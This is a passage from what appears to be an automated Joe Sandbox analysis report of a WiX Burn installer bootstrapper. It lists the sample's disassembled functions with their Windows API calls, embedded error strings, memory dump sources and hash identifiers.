                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0088E61E
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0088E626
                                                            • DeleteDC.GDI32(00000000), ref: 0088E629
                                                            • PostQuitMessage.USER32(00000000), ref: 0088E637
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                            • String ID:
                                                            • API String ID: 409979828-0
                                                            • Opcode ID: e807211f8e33164f1c75097dbd3733dce922e25dfec0c96a6dafa7dfae8aa16c
                                                            • Instruction ID: ea098a37985cdd3b10c059f0b9edf7b14e206211d217dfa89cdd4f40b41d65e7
                                                            • Opcode Fuzzy Hash: e807211f8e33164f1c75097dbd3733dce922e25dfec0c96a6dafa7dfae8aa16c
                                                            • Instruction Fuzzy Hash: 67218932104208BFDB25AF68DC0CD7B3FA8FF59764B054618FA16D62B0E7B18810DB60
                                                            Function 0088A13A Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 222COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • WixBundleOriginalSource, xrefs: 0088A1B7
                                                            • Failed to copy source path., xrefs: 0088A31A
                                                            • WixBundleLayoutDirectory, xrefs: 0088A26C
                                                            • Failed to combine layout source with source., xrefs: 0088A2A4
                                                            • Failed to combine last source with source., xrefs: 0088A210
                                                            • WixBundleLastUsedSource, xrefs: 0088A1A1
                                                            • Failed to get current process directory., xrefs: 0088A1F3
                                                            • Failed to get bundle layout directory property., xrefs: 0088A287
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirstlstrlen
                                                            • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                            • API String ID: 2767606509-3003062821
                                                            • Opcode ID: 06e7716d97d5e47db1014daeda4c3503f6e9d3e61093636efba0a90a7d2a3f3a
                                                            • Instruction ID: e72b64dd06acfb09da2ef805ab416ce2351bcc8666abdacc25f73f6dffd900d3
                                                            • Opcode Fuzzy Hash: 06e7716d97d5e47db1014daeda4c3503f6e9d3e61093636efba0a90a7d2a3f3a
                                                            • Instruction Fuzzy Hash: 69714E71D01119ABEF29EFA8D841AEEB7B9FF08310F54012AE911F7290E7759D418B62
                                                            Function 00872DBF Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 203sleepfiletimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00872E5F
                                                            • GetLastError.KERNEL32 ref: 00872E69
                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00872F09
                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00872F96
                                                            • GetLastError.KERNEL32 ref: 00872FA3
                                                            • Sleep.KERNEL32(00000064), ref: 00872FB7
                                                            • CloseHandle.KERNEL32(?), ref: 0087301F
                                                            Strings
                                                            • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00872F66
                                                            • pathutil.cpp, xrefs: 00872E8D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                            • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                            • API String ID: 3480017824-1101990113
                                                            • Opcode ID: a712173aa389992681320d2ad543b1d8fddd5ea398da5ca23b458060cdb8bf5a
                                                            • Instruction ID: de51ed696f3f6f1bc865137f43f0475e010ab0345a64935aa0f02e85d0b39842
                                                            • Opcode Fuzzy Hash: a712173aa389992681320d2ad543b1d8fddd5ea398da5ca23b458060cdb8bf5a
                                                            • Instruction Fuzzy Hash: 7A718372D41129ABDB309F989C49BAEB3B8FB08710F0042A5F908F7295D774DE809F61
                                                            Function 0087CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,008753BD,00000000,00875489,00875445,WixBundleUILevel,840F01E8,?,00000001), ref: 0087CC1C
                                                            Strings
                                                            • Failed to extract file., xrefs: 0087CCE7
                                                            • Payload was not found in container: %ls, xrefs: 0087CD29
                                                            • Failed to concat file paths., xrefs: 0087CCFC
                                                            • Failed to get directory portion of local file path, xrefs: 0087CCF5
                                                            • Failed to ensure directory exists, xrefs: 0087CCEE
                                                            • Failed to get next stream., xrefs: 0087CD03
                                                            • Failed to find embedded payload: %ls, xrefs: 0087CC48
                                                            • payload.cpp, xrefs: 0087CD1D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                            • API String ID: 1825529933-1711239286
                                                            • Opcode ID: 97c61b2cbcb4c9fc898b1c16c471cb7e1ad390ca6e9498a0255e828e04e7ad4f
                                                            • Instruction ID: 6f4b1b1d6e591b93a1100d6f4e7cacb04b11dacb79416347c7f51ec3d938d11d
                                                            • Opcode Fuzzy Hash: 97c61b2cbcb4c9fc898b1c16c471cb7e1ad390ca6e9498a0255e828e04e7ad4f
                                                            • Instruction Fuzzy Hash: 21419A31941219EBCB269E48CC819AEBBA5FF40710B11C16DE91DEB36AD770DE80DB91
                                                            Function 00874796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 008747BB
                                                            • GetCurrentThreadId.KERNEL32 ref: 008747C1
                                                            • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0087484F
                                                            Strings
                                                            • wininet.dll, xrefs: 008747EE
                                                            • Failed to create engine for UX., xrefs: 008747DB
                                                            • engine.cpp, xrefs: 0087489B
                                                            • Unexpected return value from message pump., xrefs: 008748A5
                                                            • Failed to load UX., xrefs: 00874804
                                                            • Failed to start bootstrapper application., xrefs: 0087481D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Message$CurrentPeekThread
                                                            • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                            • API String ID: 673430819-2573580774
                                                            • Opcode ID: bfb1050b7b5aeb8efb8b14d12398f667cac3d388449f8da2ba6709a9213289de
                                                            • Instruction ID: d492ea507fe355cc3fb9ecf67f28c1c38afdc5694d67c72e18e24d27b0de40d5
                                                            • Opcode Fuzzy Hash: bfb1050b7b5aeb8efb8b14d12398f667cac3d388449f8da2ba6709a9213289de
                                                            • Instruction Fuzzy Hash: 6B41C171A00659BFDB109BA4CC85EBAB7ACFF08314F108235F918E7254DB70ED0587A2
                                                            Function 00899C84 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 128COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,0089B03E,?,00000001,00000000), ref: 00899D0F
                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0089B03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00899D19
                                                            • CopyFileExW.KERNEL32(00000000,00000000,00899B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00899D67
                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0089B03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00899D96
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$AttributesCopy
                                                            • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                            • API String ID: 1969131206-836986073
                                                            • Opcode ID: b32e63e58ecfb1b618468195f1754d983d5d2be08ed796cc19e3814c2dd780f6
                                                            • Instruction ID: f110309285b2f5ab4da9ea5390e992c0163e7d576ff1b96b9c7e3a7504d7f1dc
                                                            • Opcode Fuzzy Hash: b32e63e58ecfb1b618468195f1754d983d5d2be08ed796cc19e3814c2dd780f6
                                                            • Instruction Fuzzy Hash: 5C31D872A41115A7DF20AA5A8C85E6B776CFF41B25B18812DFD58EB341D774CD00C6E1
                                                            Function 00888EBC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 00889007
                                                            Strings
                                                            • cache.cpp, xrefs: 00888FB0
                                                            • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 00888F30
                                                            • Failed to create ACL to secure cache path: %ls, xrefs: 00888FBB
                                                            • Failed to secure cache path: %ls, xrefs: 00888FEA
                                                            • Failed to allocate access for Administrators group to path: %ls, xrefs: 00888F0F
                                                            • Failed to allocate access for Everyone group to path: %ls, xrefs: 00888F51
                                                            • Failed to allocate access for Users group to path: %ls, xrefs: 00888F72
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeLocal
                                                            • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
                                                            • API String ID: 2826327444-4113288589
                                                            • Opcode ID: 9359ad37348da558a2633ebda8ca09908667db72b126fb5536239459b7e71da8
                                                            • Instruction ID: 14167f277aa86cff20ab50db970c698f0d14d2661fc29b8c9a27fa149716f269
                                                            • Opcode Fuzzy Hash: 9359ad37348da558a2633ebda8ca09908667db72b126fb5536239459b7e71da8
                                                            • Instruction Fuzzy Hash: B641E432E4072AF7DB21B6548C02FAA7679FB50B10F914164FB04FA281DFB19E449BA1
                                                            Function 0088492F Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 117fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 0088495A
                                                            • GetLastError.KERNEL32 ref: 00884967
                                                            • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 00884A12
                                                            • GetLastError.KERNEL32 ref: 00884A1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastRead
                                                            • String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
                                                            • API String ID: 1948546556-773887359
                                                            • Opcode ID: c09c69f032149c10e0380bc8888e097ea467aefb5dc2a5ed5f9f92f9ccc73326
                                                            • Instruction ID: 4223b4ad716bbf7dc0919c2d09b2eddcdb9baf2bb3e8a9cca7ebbbe39fe14db3
                                                            • Opcode Fuzzy Hash: c09c69f032149c10e0380bc8888e097ea467aefb5dc2a5ed5f9f92f9ccc73326
                                                            • Instruction Fuzzy Hash: 0A31E433D8023BABDB20AA958C46BABBB68FB04721F119129FC54EA250D774DD4087D1
                                                            Function 008B6C29 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,74DEDFD0), ref: 008B6C88
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 008B6CA5
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6CE3
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6D27
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$CompareFree
                                                            • String ID: `<u$email$name$uri
                                                            • API String ID: 3589242889-1197142144
                                                            • Opcode ID: 65015468c7ff42a0740c079a046299e03f084062dc270b6c8ece27f9e44e9b84
                                                            • Instruction ID: d50bac253cc02c63a9d1c293c33626b5a447f91331c6da29a5f76f13d0d3b0cd
                                                            • Opcode Fuzzy Hash: 65015468c7ff42a0740c079a046299e03f084062dc270b6c8ece27f9e44e9b84
                                                            • Instruction Fuzzy Hash: 34416D31A01219BBCB119B94CD54FEEBB74FF04721F2442A4E920EA3A0D7799E24DB90
                                                            Function 0088E2AF Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadBitmapW.USER32(?,00000001), ref: 0088E2E5
                                                            • GetLastError.KERNEL32 ref: 0088E2F1
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0088E338
                                                            • GetCursorPos.USER32(?), ref: 0088E359
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 0088E36B
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 0088E381
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                            • String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
                                                            • API String ID: 2342928100-598475503
                                                            • Opcode ID: f5d910c912e1da05f5c51bc10a4fb393cfcc12a3b649c96c10730c9b9d18a05d
                                                            • Instruction ID: 4c61483ab74641e46064a216d829071e5bdd3ce12d6be82c41082571b2be41c6
                                                            • Opcode Fuzzy Hash: f5d910c912e1da05f5c51bc10a4fb393cfcc12a3b649c96c10730c9b9d18a05d
                                                            • Instruction Fuzzy Hash: 81312175A00619AFDB10DFA8DD49A9EBBF4FF08710F148129F905EB385DB70E9048BA1
                                                            Function 008850CA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(?,00000000,?,?,008BB500), ref: 008850D3
                                                            • GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 00885171
                                                            • CloseHandle.KERNEL32(00000000), ref: 0088518A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCurrentHandle
                                                            • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                            • API String ID: 2815245435-1352204306
                                                            • Opcode ID: 5debac5ba63a31b005ef2beb38636ab5bc55c30080ba1bf6b88eedce82dd5834
                                                            • Instruction ID: 71caa50be7d54adf4b4c9a28d5bd5dd114ec7c6730d988143e8c7d775de9cee5
                                                            • Opcode Fuzzy Hash: 5debac5ba63a31b005ef2beb38636ab5bc55c30080ba1bf6b88eedce82dd5834
                                                            • Instruction Fuzzy Hash: E0216679D4160DFFCF11AF98CC85AAEBBB8FF04350B50816AF815E2210D7319E509B91
                                                            Function 00876882 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 75libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 008768AC
                                                            • GetProcAddress.KERNEL32(00000000), ref: 008768B3
                                                            • GetLastError.KERNEL32 ref: 008768BD
                                                            Strings
                                                            • variable.cpp, xrefs: 008768E1
                                                            • DllGetVersion, xrefs: 0087689E
                                                            • Failed to set variant value., xrefs: 00876929
                                                            • msi, xrefs: 008768A3
                                                            • Failed to find DllGetVersion entry point in msi.dll., xrefs: 008768EB
                                                            • Failed to get msi.dll version info., xrefs: 00876905
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastModuleProc
                                                            • String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
                                                            • API String ID: 4275029093-842451892
                                                            • Opcode ID: e3dc8159bd91da87408352ff09aee8f6c3bbb3d49c67cf7b4af026e146540897
                                                            • Instruction ID: 670793b2e1c981453a6a4a00e20b8de9ac818d7c547ac051bf038750b26d516d
                                                            • Opcode Fuzzy Hash: e3dc8159bd91da87408352ff09aee8f6c3bbb3d49c67cf7b4af026e146540897
                                                            • Instruction Fuzzy Hash: 2011B776E40B3ABAD720AB688C46AFFBB64FB04710F114125BE15F6341EA74DC1486E6
                                                            Function 0087D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,008747FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0087548E,?), ref: 0087D6DA
                                                            • GetLastError.KERNEL32(?,008747FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0087548E,?,?), ref: 0087D6E7
                                                            • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0087D71F
                                                            • GetLastError.KERNEL32(?,008747FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0087548E,?,?), ref: 0087D72B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AddressLibraryLoadProc
                                                            • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                            • API String ID: 1866314245-2276003667
                                                            • Opcode ID: bb8b0a7a762d1c0ae79c71a97eeba6ad3df52c105593e8fc3189b7c2a0820d16
                                                            • Instruction ID: e7b512ffce9736db94c30a7e09e9d7323882365caa092de9a00c4c0e5319fed9
                                                            • Opcode Fuzzy Hash: bb8b0a7a762d1c0ae79c71a97eeba6ad3df52c105593e8fc3189b7c2a0820d16
                                                            • Instruction Fuzzy Hash: 3A11B637A81B32A7C72556985C05F6B6B64FF04761F018635BE28FB385DF64DC0086D1
                                                            Function 00871175 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 00871186
                                                            • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 00871191
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0087119F
                                                            • GetLastError.KERNEL32(?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 008711BA
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008711C2
                                                            • GetLastError.KERNEL32(?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 008711D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                            • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                            • API String ID: 3104334766-1824683568
                                                            • Opcode ID: 31cc127f2846363216ef500119ff86b8707c3a7bc0ec44c595068bda392091ee
                                                            • Instruction ID: 21d788cb11523f3c46f27bcbac146bab82ad78fcf0ea2f881eb1b260e140b0ff
                                                            • Opcode Fuzzy Hash: 31cc127f2846363216ef500119ff86b8707c3a7bc0ec44c595068bda392091ee
                                                            • Instruction Fuzzy Hash: 0601B53174021ABBDB207BAA9C49DBF7B5CFF40761B008121F969D6200D7B0D902CBB1
                                                            Function 0088F639 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 155COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0088F64E
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0088F7C9
                                                            Strings
